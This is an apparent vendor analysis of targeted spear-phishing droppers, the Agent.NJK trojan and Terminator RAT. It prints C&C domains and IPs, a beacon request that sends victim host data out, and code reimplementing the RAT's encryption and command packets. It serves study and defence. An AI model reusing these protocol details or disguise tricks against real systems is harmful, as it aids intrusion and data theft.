Did you say Advanced Persistent Threats?

Here we analyze four targeted attack tools with Taiwan and Vietnam in their sights - but somehow linked together - and the reason why they shouldn't be called advanced.

- Social engineering vector (no exploit code) with very credible documents
- Bad criminals: typos in configuration, naive cryptographic implementation, weak code practices
- Sophistication variability: from no obfuscation to hidden position independent code, XOR encryption, XTEA encryption, stand-alone re-usable components
- Tailored infections: one threat doesn't persist, the other doesn't do anything before a reboot

Figure 1: Targeted entities were located in Vietnam and Taiwan

Once in a while we get to spend time analyzing malicious code that is not as widespread or not as well-obfuscated as other threats we've encountered in the past. This article is about one such threat. We decided to spend some time on this analysis because of interesting strings in one of the components referring to Vietnam's Central Post and Telecommunications Department. But before we delve into the topic, let's first highlight some of the findings:

- Entities in Taiwan and the Vietnam government are targeted
- Observed attacker interaction
- Evidence of an unidentified APT actor

Figure 2: Analyzed threats

You can see in the above figure all the malware samples that this article will cover. The file received by the victim is always the dropper, which we will cover shortly. Since they were carrying two different threats the dropper hashes are not the same, but their functionality is equivalent: therefore it is summarized as a single threat and considered a re-usable component in the attackers' arsenal. We have investigated two dropped threats, namely Agent.NJK and Terminator RAT, which also carries an embedded binary.

Good ol' social engineering

As we noticed from our telemetry data, the malicious software reaches its target through spear-phishing campaigns. The first dropper we analyzed came from the webmail interface of a Vietnamese governmental institution. Using targeted emails gives the attack a better chance of succeeding, since the message can be more personalized and convincing. It also narrows the distribution of the malicious files, giving them a longer shelf life since there is less chance of their being found and analyzed by Anti-Virus (AV) companies.

With knowledge of the characteristics of the first dropper, we were able to find a related piece of malware in our collection. As mentioned previously, they were carrying different threats but also had different filenames:

Threat                            | File name                            | Translation
Win32/TrojanProxy.Agent.NJK       | Bao cao ket qua.doc[137 spaces].exe  | Vietnamese for "report the results"
Terminator RAT (Win32/Protux.NAR) | .exe                                 | Chinese for "inspection report"

The presence of all those spaces is used to push the ".exe" off the screen and out of sight of the victim. To further convince the user that the file is a normal Word document, the executable displays the icon of a Word document.

Figure 3: Appearance of the files

Upon execution these droppers will decrypt their configuration parameters using a simple one-byte key XOR-based cipher, best described with some Python code below. This configuration is stored in the last 32 bytes of the last portable executable (PE) segment of the executable. Inside this configuration is a checksum, some offsets and lengths of internal resources along with other seemingly unused fields, as you will see in the struct pictured below. A hard-coded integer in the code is compared with the checksum in order to validate that configuration decryption worked.

    def xor_decrypt(ciphertext, key):
        # ciphertext is a mutable byte buffer (e.g. a bytearray).
        # 0x00 and 0xff bytes are left untouched, and so is any byte that
        # would become 0x00 or 0xff after the XOR.
        for i in range(len(ciphertext)):
            c = ciphertext[i]
            if c:
                if c != 0xff:
                    c ^= key
                    if (c and c != 0xff):
                        ciphertext[i] = c
        return ciphertext

Listing 1: XOR-based cipher

    struct hidden_segment_data
    {
        int checksum;
        char delimiter;
        char unused1[3];
        int pe_file_offset;
        int pe_file_size;
        char unused2[4];
        int doc_file_offset;
        int doc_file_size;
        char xorkey;
        char unused3[2];
        char last;
    };

Listing 2: Hidden configuration

This checksum is the same in both cases. The offset and length pairs are used to extract files from inside itself into the filesystem.

The dropper first drops the main malicious binary and then a Word document into the user's temporary folder. Both files are decrypted using the same simple XOR technique, except that the malicious binary is prefixed with 5 bytes that are hard-coded in the dropper (MZ header) and then XOR'ed with another hard-coded one-byte key. We believe this is done to avoid being detected by some AV.

Nature of the file | Filename
Malicious payload  | %TEMP%\~hCb58.tmp
Word document      | %TEMP%\~hC29f.doc
Copy of itself     | %TEMP%\~hCb37.tmp

Table 1: Dropped files

First, after the extraction, the malicious binary will be executed by the dropper. The behavior of the analyzed binaries will be covered later. The dropper will then copy itself using a handle retrieved with GetModuleHandle. It will execute this fresh copy with some command line arguments in order to clean up after itself: namely, the current full path and filename of the dropper and the full path and filename of the dropped Word document. Finally, it will exit.

For example, this is what ends up being run:

    C:\Documents and settings\user\Local Settings\Temp\~hCb37.tmp \
    "C:\Documents and settings\user\Downloads\Bao cao ket qua.doc[137 spaces].exe" \
    "C:\Documents and settings\user\Local Settings\Temp\~hC29f.doc"

Listing 3: Dropper executes the above

This same copy of the dropper, once executed with command-line arguments, has a different operation. It will first sleep for one second, leaving enough time for the original dropper execution to terminate. Then it will remove this original file and copy the decoy document (~hC29f.doc) in its place, keeping the proper .doc extension. Finally, a ShellExecuteW with the open operation is run on the newly copied document in order to open the proper editor registered for this file type.

Figure 4: Dropper operation


All this work is done to effectively simulate the result one would expect when double clicking on an innocuous Word document, except that in this case malicious code was executed first.

Figure 5: Vietnam decoy document

Figure 6: Taiwan decoy document

The combination of the spear-phishing, hiding the file's extension, a work-related file name and a Microsoft Word style icon can be pretty convincing for a user who has had no proper security awareness training, or without proper desktop hardening and protection against executables sent by email. The use of these simple techniques is well documented in Mandiant's APT1 report. Notice that no software vulnerabilities are exploited by the criminals in order to get their malware to run.

In the dropper there are two different techniques used to hide calls: a function that essentially re-implements GetProcAddress, called with hard-coded plaintext strings, and legitimate GetProcAddress calls but using an obfuscated lpProcName (XOR 0x17 of every other two chars). Interestingly, most of the calls are not obfuscated. Again, it feels like iterative AV evasion hard at work.

Aside from the fact that it seems easy to re-purpose, the dropper doesn't strike us as a particularly well written piece of code. There are notorious anti-patterns present in the codebase, like a God object and some copy-and-paste programming (although to be fair this could be the result of compiler optimization).

Figure 7: Vietnam document metadata

Figure 8: Taiwan document metadata

Win32/TrojanProxy.Agent.NJK

The first dropped binary that we analyzed is what our engine detects as Win32/TrojanProxy.Agent.NJK. This is a Visual C++ trojan that communicates over HTTP with hard-coded Command and Control (C&C) servers. In the sample we analyzed, the three servers supported by the trojan configuration were in fact pointing to the same domain name, vietnam.vnptnet.info, but using different ports (80, 443 and 5050).

The malware will adjust its TCP timeout for HTTP requests to 15 minutes and then loop forever trying to contact the C&C domain via the three ports in its configuration. An interesting fact about this threat is its lack of persistence, meaning that it will be executed only once and will not be relaunched if the system reboots. There is no obvious attempt at obfuscation, and simply running strings on the binary reveals a great deal about the sample and its capabilities.

In its attempt to contact the C&C, the malware will send several pieces of information about the host in a GET request and use a specific User-Agent string. The user data is in a 105 byte array, encoded in hexadecimal and sent in the path component of the GET request. It contains information such as: a string we believe is used to track attack campaigns; the internal IP address of the host; the Computer Name; a Windows Version ID; and the current username executing the process. No encryption is applied to this data. Below is the exact format of this payload.

Figure 9: Initial payload sent by the client

Once encoded, requests look like the one below:

    GET /4350542D4E4D43000000000000000000000000000000000031393
    22E3136382E3136362E31343500555345522D3938394243313335353500
    0000000000000000000000000000000107757365720000000000000000
    0000000000000000000000000000000000000000 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.9527)
    Host: vietnam.vnptnet.info

Listing 4: Sample HTTP GET request

The server will reply with conventional HTTP server headers, except that it adds an Accept header field with the value "x-wav/y-img" (something seen before). The trojan will not process the server's answer unless this string is present in that header. Note that Accept headers are usually part of the client HTTP request and not server responses.

The C&C commands are sent unencrypted and are always 796 bytes long. The first integer in the command data is the command ID. The supported commands are:

Command id | Command description
1000       | The command-line is executed by the victim and stdout and stderr are sent back to the C&C
2000       | The victim replies "\r\n\r\nRecieve KeepAlive Commond\r\n\r\n" (including the typos...)
3004       | Download a file to the victim's computer. Filename is specified in the command data.
3005       | Upload a file to the C&C. An offset argument can be specified so as to upload only a part of the file.
3006       | Change the current directory to the one specified in the command data.
3007       | Set the time (in ms) for the WaitForSingleObject function of a command line execution (command id 1000)
3008       | Sends to C&C information about the drives' total size, free space, letters and names.
3009       | Lists the files in a specified directory. Filename, last modification date and sizes are sent.
3010       | Delete a given file by name
3011       | Spawn a process with the command-line given in command data. Nothing sent back to C&C.

Table 2: Agent.NJK supported commands
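A defender's decoder for the beacon shown in Listing 4, added here and not part of the original analysis: it scans constructed web-proxy log lines for the Agent.NJK User-Agent together with a 210-hex-character path and recovers the fields the text lists. The field widths used by build_beacon are inferred from the zero padding visible in Listing 4 and are an assumption (Figure 9 is authoritative); the log line format is constructed.

```python
import re

# User-Agent from Listing 4 and the size of the host-info array (from the text).
NJK_USER_AGENT = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; "
                  ".NET CLR 1.1.9527)")
BEACON_LEN = 105
HEX_PATH = re.compile(r"^/([0-9A-Fa-f]{%d})$" % (BEACON_LEN * 2))
# Common-log style line with the request and User-Agent in quotes (constructed).
LOG_LINE = re.compile(r'^(\S+) .*?"GET (\S+) HTTP/1\.[01]" \d+ "([^"]*)"')
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{3,}")


def decode_beacon(path):
    """Hex-decode the GET path and pull out the four strings the text lists
    (campaign tag, internal IP, computer name, username) plus the raw bytes
    sitting between computer name and username (the Windows version ID).
    No offsets are assumed: printable runs are taken in order of appearance."""
    m = HEX_PATH.match(path)
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    runs = list(PRINTABLE_RUN.finditer(raw))
    if len(runs) < 4:
        return None
    campaign, ip, computer, user = (r.group().decode() for r in runs[:4])
    gap = raw[runs[2].end():runs[3].start()]
    return {"campaign": campaign, "internal_ip": ip, "computer_name": computer,
            "username": user, "version_bytes": bytes(b for b in gap if b)}


def scan_log(lines):
    """Flag requests carrying the NJK User-Agent and a path that decodes to a
    plausible beacon; returns one alert per hit, with the decoded host data."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        src, path, ua = m.groups()
        if ua != NJK_USER_AGENT:
            continue
        beacon = decode_beacon(path)
        if beacon:
            alerts.append(dict(src=src, **beacon))
    return alerts


# --- constructed sample beacon ---------------------------------------------
def build_beacon(campaign, ip, computer, version, user):
    """Assumed field widths (24/16/31/2/32 = 105 bytes), inferred from the
    zero padding in Listing 4."""
    raw = (campaign.encode().ljust(24, b"\0") + ip.encode().ljust(16, b"\0")
           + computer.encode().ljust(31, b"\0") + version
           + user.encode().ljust(32, b"\0"))
    assert len(raw) == BEACON_LEN
    return "/" + raw.hex().upper()


# The strings are what Listing 4 decodes to; the log lines themselves are made up.
SAMPLE_PATH = build_beacon("CPT-NMC", "192.168.166.145", "USER-989BC13555",
                           b"\x01\x07", "user")
LOG_LINES = [
    '10.0.0.5 - - [20/Nov/2013:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [20/Nov/2013:10:01:09 +0000] "GET %s HTTP/1.1" 200 "%s"' % (SAMPLE_PATH, NJK_USER_AGENT),
    '10.0.0.7 - - [20/Nov/2013:10:01:10 +0000] "GET /deadbeef HTTP/1.1" 404 "%s"' % NJK_USER_AGENT,
]

if __name__ == "__main__":
    for alert in scan_log(LOG_LINES):
        print(alert)
```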

Very simple, nothing fancy, and the code doesn't reveal much about the attackers' intentions. Unfortunately, all that is left to the trojan operator, so we can't draw any conclusions about the operation with only the malware sample to work from. Rather than being simply naive, this is rather stealthy. But then again, some funky strings are also present in the binary, like "I want to go to the GREAT WALL, inner Mongolia very much" and some unused proxy credentials (somnuek.bu / 044253516). These proxy credentials are not referred to anywhere in the code, which leads us to think that this is a feature supported by the malware that was compiled out when this threat was assembled for this campaign.

The hardcoded campaign string (CPT-NMC) sent by the client further confirms the targeted nature of the attack. CPT stands for Central Post and Telecommunications Department, a department of the Vietnamese government. We can also notice that the top-level domain used for C&C (vnptnet.info) is strikingly similar to Vietnam's vnpt.vn, which is Vietnam Posts and Telecommunications Group, and was probably chosen as a means of camouflage within Intrusion Detection System (IDS) logs. Finally, the decoy document writes about telecoms and testing and carries some network diagrams, which all seems very credible to a potential victim. It looks like this campaign was aimed at Vietnam's CPT, and we know Vietnam's officials have been under targeted attack this year.

We're up all night to get lucky

We saw an operator interact with a system we infected and monitored. We even got some evidence of manual operation. Here are the highlights of the interaction that we have observed on the system.

    1. client <-
       command id/name: 3008/Get Drives Infos
       client ->
       label: C:
       type: 3 (DEVICE_FIXED)
       free: 7828
       total: 10228
       label: D:(8
       type: 5 (DEVICE_CDROM)
       free: 0
       total: 589
    2. client <-
       command id/name: 1000/ExecuteCommandLine executed:
       netsta -ano
       client ->
       'netsta' is not recognized as an internal or
       external command, operable program or batch file.
    3. client <-
       command id/name: 1000/ExecuteCommandLine executed:
       netstat -ano
       client ->
       ...
    and then other commands:
    4. set
    5. dir C:\DOCUME~1\user\recent /od
    6. dir C:\DOCUME~1\user\desktop
    7. dir c:\
    and then it stopped

Listing 5: Agent.NJK attacker interactions

These are all reconnaissance operations: netstat to view current network connections, drive enumeration, set to view the current environment variables, and then some file locations were explored. Something that leads us to think that this operation is not automated is the typo highlighted at interaction (2), a behavior we've seen before. netsta was written instead of netstat, leading to the 'not recognized' error sent to the server. We see no good reason to fake such an operator error, and this is why we think we caught a legitimate typo. Here is a screen capture of some of the content of the interactions that was left out of the above highlights. As you can see, all this information is sent in plain text over the network.


In the above screenshot we notice that the server replied with the full HTTP headers in the packet highlighted by (1) and with a Content-Length of 796 bytes, just like any C&C command. However, the server doesn't send these bytes in that packet, so the client hangs waiting for those bytes to come in. After a 30 minute delay the server just sent a TCP reset (RST) to close the connection. The client was never allowed again onto the server, getting instantaneous TCP resets for any connection attempts on any of the three configured ports, as you can see in the screenshot below.

Figure 11: Agent.NJK - end of the network connection

Figure 12: No response, various ports retried (80, 443, 5050)

This is another behavior that reveals a little bit more information about the way they operate. Once the victim computer is flagged as not of interest to the operators, it is actively blocked from the C&C at the TCP layer rather than at the application layer (HTTP).

The non-persistence characteristic of the attack strengthens the hypothesis that it is targeted, since the attackers will leave little trace and little network activity if they don't install an additional component through the trojan. A typical attack scenario with this tool would then be: figure out potential victims in an organization; send spear-phishing emails; wait; get connections from the trojan; and quickly and interactively investigate the computers for the sensitive data you are looking for. If the data isn't there, pull the plug, and if it is there, install an additional component through the commands for file download (3004) and file execution (3011).

Without full incident investigation forensics, which we are not in a position to perform, being an AV vendor rather than an incident response team, there is little we can do to help victims of this threat know what happened on their systems, except to document how it works and hope that this information will be useful.

Terminator RAT (aka FAKEM RAT)

When we started analyzing this threat, our product detected it as Win32/Protux.NAR. When we reverse engineered the cryptographic protocol of the network communication with the C&C, we found out that the threat was documented by malware.lu and Trend Micro as Terminator RAT or FAKEM RAT, but that our sample diverged a lot from the one they analyzed, and carried an additional binary. Last month, FireEye released an analysis of a sample very similar to this one, but the hashes are still different. In this article, we will focus on giving additional details of the threat and we encourage you to refer to these past articles for further background information.

We first found out that what we called Win32/Protux.NAR was in fact the Terminator RAT when we looked at the network encryption and stumbled on malware.lu's report titled APT1: technical backstage. Although their reference to the APT1 group is challenged by the community, we definitely have here a private Trojan that has been re-used on several campaigns by the same group. Compared with the Agent.NJK trojan, here the sophistication level is cranked up one notch. First, the configuration and strings are encrypted using a slightly modified implementation of XTEA. XTEA uses a 128 bit key and works on 64 bit blocks.

The implementation is naive since it uses the worst block cipher mode of operation, as you will see in the screenshots below.

Figure 13: Mandatory cryptographic loop screenshot

Figure 14: Sample ciphertext at 0x404198 with obvious patterns (figure annotation: "64 bit blocks of zeros always")

Figure 15: Plaintext at 0x404198 after decryption

With proper use of block chaining, figure 14 wouldn't have carried any discernable pattern. Here's the configuration of our sample before decryption:

Figure 16: Configuration and strings before decryption

(1) is the XTEA key, (2) shows two ports (9000, 9090) and some other unencrypted material we couldn't figure out, (3) shows more unencrypted strings related to the way the malware operates but with null bytes injected in them (the strings are re-assembled before being used in the code).

Figure 17: Decrypted configuration and strings

(1) is the folder where the malware is installed (in %APPDATA%), (2) marks the filenames given to the copied and extracted files, (3) shows the C&C's domain name, (4) is the name of the PE image resource directory entry where further payloads are hidden (an executable file and position independent code) and (5) shows the registry keys modified for persistence.

Next, it will load and install in memory the offsets to some functions that are not declared in the PE import table. To do so they re-implemented an equivalent of GetProcAddress, just like they did in the TrojanProxy.Agent.NJK threat. However, this time the original DLL and function name strings are neither encrypted nor obfuscated, and the offsets are installed in fixed memory locations in the data segment, so they are easy to cross-reference for further analysis of the threat. They could have made the job harder, but they didn't.

On its first run, there is no networked malicious behavior. It will create a thread that will change the path of the Startup Folder in the registry (to %APP_DATA%\2019), copy the existing files from the old Startup Folder to the new one, move itself with the MOVEFILE_DELAY_UNTIL_REBOOT flag to the new Startup Folder under the name "svchost .exe", decrypt and extract a PE from within itself into the Startup Folder with the name "winslogon.ini" (which we will refer to as the proxy tunnel component), do a move with the MOVEFILE_DELAY_UNTIL_REBOOT flag to rename it to "winslogon.exe" and then quit. This is summarized below:

Figure 18: Persistence code with a branch to deal with failure

As you can see, there is also code to handle failure in the Startup Folder registry changes. The fallbackPersist call will copy itself to the current Startup Folder with the name wuauclt.exe and then exit. Depending on the location of that folder, this will either delay another attempt at modifying the registry on the next reboot - until someone with the proper privileges to change this registry setting logs in - or it will trigger the main payload, which we will describe shortly.

Always moving

As you saw, this threat relies heavily on the MOVEFILE_DELAY_UNTIL_REBOOT flag of the MoveFile() function. This serves as a simple way to relocate the malware executable even if the file is currently executing. It may also prevent triggering heuristics and sandbox technologies. That said, those delayed moves don't stop there. On each subsequent execution of the binary, a little evasion maneuver is performed. First, it will copy itself into a temporary location (GetTempPath() + "~7ti2"). Then, a random number of random bytes are appended to the end of the file. Lastly, a move with the MOVEFILE_DELAY_UNTIL_REBOOT and MOVEFILE_REPLACE_EXISTING flags will be performed to replace the currently running binary on reboot. This implies that the hash will change on every reboot without affecting proper operation.

All of which can be visually represented by the following diagram:

Figure 19: Terminator's evasion maneuver

Main payload

After a reboot, when Windows runs every executable in the Startup Folder, the two binaries "svchost .exe" (the main component) and winslogon.exe (the proxy tunnel component) will be executed. The main component performs the same decryption of configuration and strings and thread creation as on its first run, but then the thread takes a separate branch based on the fact that it is run from a folder which contains the "App" string. In that branch it will first sleep for 5 minutes, then perform the copy/move operation described earlier, and then reach its main payload.

That payload will allocate memory, copy the PE image resource directory entry with id 0x8A under the ACCELORATOR resource directory into this newly allocated memory, and apply an XOR with a single byte key (0x32) to encrypt it. This last encryption operation seems strange since it could have already been pre-encrypted that way in the resource entry, but this wasn't done for reasons still unknown to us.

As a side note, ACCELORATOR appears to be a clever typo of ACCELERATOR, a term used to describe keystrokes defined in applications and usually stored in PE resources.

This allocated memory is actually executable code. We will refer to this as position-independent code from this point on. A few more things happen before moving into this newly extracted code segment: resolve the current host's IP, XOR encrypt and copy that IP and a hardcoded port 8000 at specific offsets in that code (you will understand why later) and then add some 32 bytes of XOR'ed random data. All XOR operations are performed with the same 0x32 single byte key.
The position-independent code makes some unconventional use of the registers, which leads us to believe that this was written directly in assembly language. First, the memory segment itself will be XOR decrypted with a single byte key (0x32). Then it will load the addresses for all the functions it will use later. It does so by re-implementing LoadLibrary and GetProcAddress. However, instead of loading the function names as strings, it uses a table of pre-computed ROR hashes for each function. The code regenerates the hash for each function in the DLL and when they match, the hash is replaced by the function's address in the table. This technique is quite common and has been documented before. On the other side, the library name is stored as a string.

Figure 20: Position independent code loading and execution

Figure 21: kernel32.dll hashes to lookup

Figure 22: After loading function addresses

The code then creates an Event named 'sxX5{c4' with the CreateEvent function and uses it as a mutex to ensure that only one copy of itself will execute at any one time. Now, moving on to the main payload, we reach a loop on all C&Cs in its config. Two of these are hardcoded and are the same as the ones in the XTEA encrypted config, as mentioned earlier. The third is the one injected earlier, which points to the host's current IP and hardcoded port 8000 (as explained later). It will loop forever on all three and will sleep 30 seconds if it can't connect. Upon a successful connection, the malware will send information about the client to the C&C in a 1024 byte packet. The format is pictured below.

Figure 23: Position independent code loading and execution

The header is made up of the random data that was previously copied in from the main component, with every two bytes padded with the same pattern. Username and Computer name are strings 128 bytes long, and the system's codepage is included as an integer. There are also some hardcoded integers: two integers of value 0x130, 0x0 (1) and an integer of value 0x30005 (2). Both of these are identical to those observed by FireEye. There is also some string value that could be the campaign ID (3). Unlike the other unknown values, this one is not embedded in the code but in the configuration, and there is some attempt at obfuscating the access to the variable, which in our case was the string "wet". The rest of the packet is empty (bytes 321 to 1024) except for the last byte, where there is a newline character ("\n").

Figure 24: Position independent code loading and execution

The communications are encrypted using a simple scheme: each byte of the plaintext is XOR'ed with every character in the key and rotated to the right by 3 (ROR'ed) after each XOR operation. The key is static and is "YHCRA" ("ARCHY" backwards). This is easier to explain with code:

    def ror(x, n, bits=8):
        # rotate the bits-wide integer x to the right by n positions
        return ((x >> n) | (x << (bits - n))) & ((1 << bits) - 1)

    def encrypt(pt):
        key = "ARCHY"[::-1]
        ct = ""
        for c in pt:
            p = ord(c)
            for k in key:
                p = p ^ ord(k)
                p = ror(p, 3)
            ct += chr(p)
        return ct

Listing 6: Terminator network encryption

Once decrypted, the server traffic contains a command ID in the first integer of the 1024 byte payload returned. Well described by Trend Micro, the commands supported by this RAT are the following:

Command id | Command description
0x211      | Execute code attached in command data
0x212      | Reconnect to receive data
0x213      | Sleep, close socket and reconnect
0x214      | Exit

Table 3: Terminator supported commands

As you can see, these are again very generic, meaning that the malware's true goals and capabilities are hidden when doing static analysis. However, Trend Micro was able to observe attackers and documented some of the code that attackers sent in their 0x211 commands. Command prompt, file manager, host information, process management, registry management, screen captures, service management, password stealing, and file upload were all capabilities that they observed.

Even though we had a very similar threat to hand, the C&C domains extracted from the configuration were slightly different.

Domain                  | IP              | Port
"catlovers.25u.com " (1) | doesn't resolve | 9000
dryboxs.4dq.com         | 123.51.208.142  | 9090
localhost               | depends (2)     | 8000

The first domain configured (1) contains a space before the null-byte string terminator, which means that the DNS resolver is unable to resolve it. It is thus never used by the malware. As we said earlier, the third domain is looked up using gethostname and gethostbyname (2) and then copied into the position independent code before it is launched. 25u.com and 4dq.com are both operated by the changeip.com dynamic DNS service, operated in the US. IP 123.51.208.142 is Taiwan based.

Here's a table that highlights the differences observed between the various observed campaigns:
                | Trend Micro's analysis | FireEye's analysis | ESET's analysis
Activity        | Since 2009 | June 2013 | June 2013
Campaign        | undisclosed | zjz1020 | wet
Distribution    | Word or Excel documents with exploit code | Word or Excel documents with exploit code | Social engineering
Installation    | Registry Run entry | Modified Startup Folder | Modified Startup Folder
XTEA key        | None used | 0x3c78 | 0x9ac9
Network traffic | Fake header in first 32 bytes | Repeated pattern in first 32 bytes | Random bytes with padding intermixed in the first 32 bytes
Proxy tunnel    | No mention of this component | Stand-alone component for exfiltration through corporate proxy | Stand-alone component for exfiltration through corporate proxy
Proxy filename  | None | sss.exe | winlogon.ini then winnlogon.exe
C&C             | vcvcvcvc.dyndns.org, zjhao.dtdns.net, avira.suroot.com, *.googmail.com, *.yourturbe.org, freeavg.sytes.net | liumingzhen.zapto.org, liumingzhen.myftp.org, catlovers.25u.com, localhost port 8000 | "catlovers.25u.com[space]" port 9000 (broken), dryboxs.4dq.com port 9090, localhost port 8000 (see proxy tunnel)
IPs             | Varied | 123.51.208.69 | 123.51.208.142 (same /24)
DDNS Provider   | DynDNS, DtDNS, noip.com | noip.com | changeip.com

Table 4: Summary of the differences in the campaigns
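The network scheme of Listing 6 with its inverse and the packet checks from Table 3 and Figure 24, as an added example that is not the RAT's own code: decrypt undoes the XOR/ROR3 rounds in reverse key order, parse_server_command reads the command ID from a 1024-byte packet, and is_client_hello is a detection check for a captured client packet built on the hard-coded integers and the trailing newline the text describes. Little-endian integers and the field order in build_client_hello are assumptions.

```python
import struct

KEY = b"YHCRA"            # "ARCHY"[::-1], the static key from Listing 6
PACKET_SIZE = 1024        # both directions use fixed 1024-byte packets
# Hard-coded integers the text says are identical in the ESET and FireEye
# samples (0x130, 0x0, 0x30005); little-endian is assumed (x86 build).
HELLO_MARKER = struct.pack("<III", 0x130, 0x0, 0x30005)

COMMANDS = {0x211: "execute code attached in command data",
            0x212: "reconnect to receive data",
            0x213: "sleep, close socket and reconnect",
            0x214: "exit"}


def ror8(x, n):
    return ((x >> n) | (x << (8 - n))) & 0xFF


def rol8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF


def encrypt(pt):
    """Listing 6 on bytes: per byte, XOR with each key char, then ROR by 3."""
    out = bytearray()
    for b in pt:
        for k in KEY:
            b = ror8(b ^ k, 3)
        out.append(b)
    return bytes(out)


def decrypt(ct):
    """Inverse: undo the rotation and the XOR, walking the key backwards."""
    out = bytearray()
    for b in ct:
        for k in reversed(KEY):
            b = rol8(b, 3) ^ k
        out.append(b)
    return bytes(out)


def parse_server_command(ct):
    """Decrypt a C&C -> client packet: the first integer is the command ID
    (Table 3); the remainder is the command data."""
    if len(ct) != PACKET_SIZE:
        raise ValueError("Terminator packets are always %d bytes" % PACKET_SIZE)
    pt = decrypt(ct)
    cmd_id = struct.unpack_from("<I", pt)[0]
    return cmd_id, COMMANDS.get(cmd_id, "unknown"), pt[4:]


def is_client_hello(ct):
    """Detection check for a captured client -> C&C packet: fixed size, the
    hard-coded marker integers present and a newline in the last byte."""
    if len(ct) != PACKET_SIZE:
        return False
    pt = decrypt(ct)
    return HELLO_MARKER in pt and pt.endswith(b"\n")


# --- constructed packets for the demo (not captured traffic) ----------------
def build_server_command(cmd_id, data=b""):
    body = struct.pack("<I", cmd_id) + data
    return encrypt(body.ljust(PACKET_SIZE, b"\x00"))


def build_client_hello(username, computer, codepage=1252, campaign=b"wet"):
    """Field order is assumed from the description of Figure 24; the check in
    is_client_hello relies only on the markers and the trailing newline."""
    header = bytes(32)  # stands in for the 32 random header bytes
    body = (header + username.ljust(128, b"\x00") + computer.ljust(128, b"\x00")
            + struct.pack("<I", codepage) + HELLO_MARKER + campaign)
    return encrypt(body.ljust(PACKET_SIZE - 1, b"\x00") + b"\n")


if __name__ == "__main__":
    pkt = build_server_command(0x213)
    print(parse_server_command(pkt)[:2])
    print(is_client_hello(build_client_hello(b"user", b"USER-989BC13555")))
```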

Summary of similarities

- Same network encryption algorithm ("ARCHY"[::-1] xor/ror3)
- Same 1024 byte network payload
- Same commands (0x211, etc.)
- Most C&C rely on dynamic DNS
- Operated from the same /24 network owned by a Taiwanese ISP

This threat lacks a coherent design and seems to be iteratively modified to accomplish the attackers' agenda on the fly. The presence of 3 different encryption mechanisms and two different techniques to load function addresses tends to justify this assumption. Furthermore, using XTEA encryption for the C&C information while also showing them in plaintext in the position independent code seems like a mistake. Finally, some functions are awkwardly patched to add features, like the encryption / decryption functions shown below. An on / off flag (1) is used to determine if the function is calling the XTEA encryption (2) or some XOR with a fixed one byte key (3), reminding software engineers of the coding-by-exception anti-pattern.

Figure 25: Strange cryptographic code paths

Having various analyses on the same threat is interesting because we can see what gets re-purposed when a campaign changes. In the current Terminator RAT case we can see that both malware components and infrastructure components were altered. XTEA keys, network protocol headers, and the dropped proxy tunnel component filename were changed in the binary itself, while DDNS providers and IP addresses were changed on the infrastructure side. It's also interesting to see that the use of the ACCELORATOR name as the hidden PE resource and the network protocol encryption key are things that haven't changed between campaigns. What conclusions can be drawn from this observation is an exercise left to the reader.

Proxy tunnel component

Again, comprehensively described by FireEye as sss.exe, this component is present for the eventualities where the target's network doesn't allow an outgoing network connection to reach the C&C servers directly. In a nutshell, it binds to the local port 8000 and will tunnel anything that connects to it through the legitimate proxy configured on the computer. It uses the HTTP CONNECT verb to get an end-to-end tunnel up to the C&C.

In our investigation, the file was named winslogon.exe and had a different hash, solely because the configuration (and maybe the code) was different. We also noticed the presence of an encrypted log file (hardcoded to %TEMP%\~DF3bbs.tmp) which can be decrypted with a single byte key XOR (0xAB), as shown by the code below.

    key = 0xAB
    ct = open("logfile", "rb").read()
    # iterating over bytes yields integers; XOR each one with the key
    pt = bytes(e ^ key for e in ct)
    print(pt.decode("latin-1"))

Listing 7: Decrypt proxy tunnel component logs

It uses an Event Object named with the non-printable character represented by 0x13 to ensure that only one instance of the proxy is running. Additionally, as with the Terminator / FakeM RAT threat, the binary will perform a little dance, meaning that on each execution it will copy itself into a temporary location (GetTempPath() + "~7ti3"), append a random number of random bytes to the end of the file, then add the XTEA encrypted configuration. Lastly, a move with the MOVEFILE_DELAY_UNTIL_REBOOT and MOVEFILE_REPLACE_EXISTING flags will be performed to replace the currently running binary. So the hash of the file will change, but behavior and functionality stay intact. Finally, we observed a different location for the stored proxy configuration than the one FireEye reported. In our case it was stored in %Windir%\Proxy.

The addition of this component as a stand-alone to augment Terminator RAT's exfiltration capabilities is very interesting as it could be easily re-used. Additionally, a loosely coupled component with no malicious behavior (although suspicious), packaged with a RAT whose malicious payload is well hidden in position-independent shellcode supporting very generic commands, makes the static analysis of the threat quite difficult and leaves everything to the imagination about what it is that the attackers are after.

There is no A in this APT

Indeed, none of these threats were packed to thwart reverse-engineering, no exploit code was used, and there were several observations of poor software development and operational practices: sloppy coding, bad cryptography, operator errors, leakage of unused proxy credentials and even mistakes in configuration that rendered a C&C domain completely useless. This is not advanced.
However, as long as these less sophisticated attacks are still successful they will continue, because they are obviously cheaper to perform than the more complex ones.

We can see two [A]PT strains at work here. One with no A, where we have low-complexity, low-cost attacks in which manual operators are thrown at several targeted campaigns, using simple malware modified just enough to avoid detection. Then, on the other hand, groups seem to exist that truly deserve the epithet: A-teams, you might say. (Note that we avoided the cyberwar kind of APT.)

So, before issuing your press release about getting popped by an APT group, at least make sure that you are not simply overly exposed to simplistic B-list attacks. User awareness training and locked-down group policies incorporating the filtering of executables in emails would have mitigated or prevented the threats described in this post. Is your company at least taking these steps?

Author: Olivier Bilodeau
Contributors: Mathieu Lavoie, Marc-Etienne M. Léveillé